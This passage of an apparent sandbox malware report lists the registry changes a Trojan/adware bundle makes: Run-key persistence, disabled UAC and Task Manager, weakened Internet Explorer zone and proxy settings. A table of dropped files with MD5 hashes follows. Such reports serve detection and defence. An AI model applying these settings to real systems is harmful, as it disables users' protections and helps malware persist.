[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process runonce.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE A7 6E E3 6F 15 05 2D 46 B7 1B F2 62 FA 5F EC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"grpconv.exe" = "Windows Progman Group Converter"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"
The process cvtres.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB BC 73 17 9B FC 38 20 B9 C5 7F EC 00 EB F2 DE"
The process cvtres.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 AD 4A A3 BC 16 4C A8 7D 79 1D D2 F0 C5 01 FB"
The process cvtres.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 72 98 CA C6 12 F5 02 D8 A6 F6 9D 5A 96 0B 1C"
The process cvtres.exe:952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 FD 18 0D 51 E0 A0 35 12 A6 4F 24 C0 5D DF 7E"
The process cvtres.exe:1064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 D2 D2 DC 4B 60 E6 26 1E 29 8E 35 32 67 69 1B"
The process cvtres.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0D 46 7A F5 1D BD 3B 99 0F 29 F5 E3 80 85 D8"
The process cvtres.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6B 75 2A 6B C1 0D 17 F2 2F B2 F5 85 7B 50 43"
The process cvtres.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D3 5E 87 47 30 4E 42 C5 1D A0 D1 DC 6A 45 B3"
The process cvtres.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 11 D1 C4 63 2E C0 4D DE 2C 7C 39 47 EC 15 5D"
The process Osman_Navigation.exe:4072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayVersion" = "2.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"UninstallString" = "%Program Files%\FrivLauncher\uninst.exe"
[HKLM\SOFTWARE\Reltek]
"channel" = "egg7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 81 51 83 26 17 CC 23 93 E1 47 CA 29 DC AA 9D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"DisplayName" = "FrivLauncher 2.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\FrivLauncher.exe]
"(Default)" = "%Program Files%\FrivLauncher\FrivLauncher.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Reltek]
"LangID" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FrivLauncher]
"Publisher" = "Friv Launcher"
"DisplayIcon" = "%Program Files%\FrivLauncher\FrivLauncher.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
The process PSSetupNativeUtils.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD B5 3C 3C 58 DB F4 A8 01 1B D6 81 E6 8A 15"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process mastermind.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\BrowserEmulation]
"DisableSiteListEditing" = "1"
[HKLM\SOFTWARE\master]
"InstalledTime" = "2016-5-12 0:18:21"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"WarnOnClose" = "0"
[HKCU\Software\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\master]
"InstalledVersion" = "1.00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0]
"(Default)" = "MiamiReportsLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400" = "0"
[HKLM\SOFTWARE\master]
"ApplicationPath" = "%Documents and Settings%\%current user%\Application Data\master"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1409" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1400" = "0"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"Enabled" = "1"
[HKCU\Software\master]
"Macaddress" = "00-0C-29-5C-94-64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1409" = "3"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Safety\PrivacIE]
"DisableToolbars" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2]
"1609" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableTaskMgr" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\master]
"Macaddress" = "00-0C-29-5C-94-64"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master\masterReports.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 42 37 BA E3 A6 E0 E6 92 41 23 9F 4B 19 9F 90"
[HKCU\Software\master]
"InstalledTime" = "2016-5-12 0:18:21"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1409" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext]
"DisableAddonLoadTimePerformanceNotifications" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{839891CF-C2A2-4B95-BA8D-AE02918B81F6}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\master"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1400" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1409" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1609" = "0"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\CommandBar]
"ShowCompatibilityViewButton" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
User account control (UAC) is disabled:
"EnableLUA" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hwopt12052016001648.exe:912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 2F 7B 95 FF 71 EA 0B 36 72 C4 FF 25 79 5E 44"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\Service1]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[ADWARE_ROI]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
The process grpconv.exe:3484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 83 16 AA 74 E1 04 08 10 AA D3 69 69 82 F1 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\GrpConv]
"Log" = "Init Application."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\MSProgramGroup\Shell\Open\Command]
"(Default)" = "%System%\grpconv.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\MSProgramGroup]
"(Default)" = "Microsoft Program Group"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.grp]
"(Default)" = "MSProgramGroup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
883eff06ac96966270731e4e22817e11 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\System.dll |
0ee8bfa743945490372677428d83fb13 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\septillions.dll |
115022aa231b4a3daed5aa590ff5e38c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\obuwa\obuwa.exe |
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
d53d3f1be1b0b4d3763058da5afb8ba2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe |
7ae6a446e35a1e199856cb91c797e6f4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\NActions.dll |
adb29e6b186daa765dc750128649b63d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\UAC.dll |
2f672971373f9826ad77db6a21e39e18 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe |
a39df582ca051afc8811fbd00db12f10 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll |
cbc4d01bc7af8ebf41b96518793f3238 | c:\WINDOWS\hwopt_12052016001648\InstallUtil.exe |
83d51ff1c826da99ebf87b02dd0cc744 | c:\WINDOWS\hwopt_12052016001648\InstallationStatsUploder_12052016001648.exe |
4288ea76d5ea9ca5146492d4bf25a743 | c:\WINDOWS\hwopt_12052016001648\NetworkUtil.dll |
b3ebc63dbc6c7ffadfaff309274da226 | c:\WINDOWS\hwopt_12052016001648\Newtonsoft.Json.dll |
3c4e4db1f4a657592800fd5e0db4e405 | c:\WINDOWS\hwopt_12052016001648\Utils.dll |
7d071297b9c9915e1a9176930ffbbfcb | c:\WINDOWS\hwopt_12052016001648\WinDivert.dll |
b3c1811331f3906b74a6d926ddff806d | c:\WINDOWS\hwopt_12052016001648\WinDivert32.sys |
7d071297b9c9915e1a9176930ffbbfcb | c:\WINDOWS\hwopt_12052016001648\addon\WinDivert.dll |
b3c1811331f3906b74a6d926ddff806d | c:\WINDOWS\hwopt_12052016001648\addon\WinDivert32.sys |
315d47153122903c52051b7027988f85 | c:\WINDOWS\hwopt_12052016001648\addon\atl110.dll |
bf38660a9125935658cfa3e53fdc7d65 | c:\WINDOWS\hwopt_12052016001648\addon\msvcr100.dll |
4ba25d2cbe1587a841dcfb8c8c4a6ea6 | c:\WINDOWS\hwopt_12052016001648\addon\msvcr110.dll |
034ccadc1c073e4216e9466b720f9849 | c:\WINDOWS\hwopt_12052016001648\addon\msvcr120.dll |
f67ca8d338dfd99e3c540336221f8fa7 | c:\WINDOWS\hwopt_12052016001648\addon\msvcr120d.dll |
5598b73b9f8b3740d094949cc8dcd818 | c:\WINDOWS\hwopt_12052016001648\addon\netman.exe |
0c6b43c9602f4d5ac9dcf907103447c4 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\certutil.exe |
269beb631b580c6d54db45b5573b1de5 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\freebl3.dll |
6e84af2875700285309dd29294365c6a | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libnspr4.dll |
1fae68b740f18290b98b2f9e23313cc2 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libplc4.dll |
9ae76db13972553a5de5bdd07b1b654d | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\libplds4.dll |
bf38660a9125935658cfa3e53fdc7d65 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\msvcr100.dll |
4ba25d2cbe1587a841dcfb8c8c4a6ea6 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\msvcr110.dll |
a1c4628d184b6ab25550b1ce74f44792 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nss3.dll |
d1243817a1b22b855de0852cf5b53bf5 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssckbi.dll |
051652ba7ca426846e936bc5aa3f39f3 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssdbm3.dll |
c26e940b474728e728cafe5912ba418a | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\nssutil3.dll |
a5c670edf4411bf7f132f4280026137b | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\smime3.dll |
2ab31c9401870adb4e9d88b5a6837abf | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\softokn3.dll |
b58848a28a1efb85677e344db1fd67e6 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\sqlite3.dll |
717dbdf0e1f616ea8a038259e273c530 | c:\WINDOWS\hwopt_12052016001648\addon\nss_tools\ssl3.dll |
bc76279451a61052d34f203479c6a9be | c:\WINDOWS\hwopt_12052016001648\hwopt12052016001648.exe |
d0052d33941cc8d6e2c471ed75a61906 | c:\WINDOWS\hwopt_12052016001648\hwopt12052016001648_updater_service.exe |
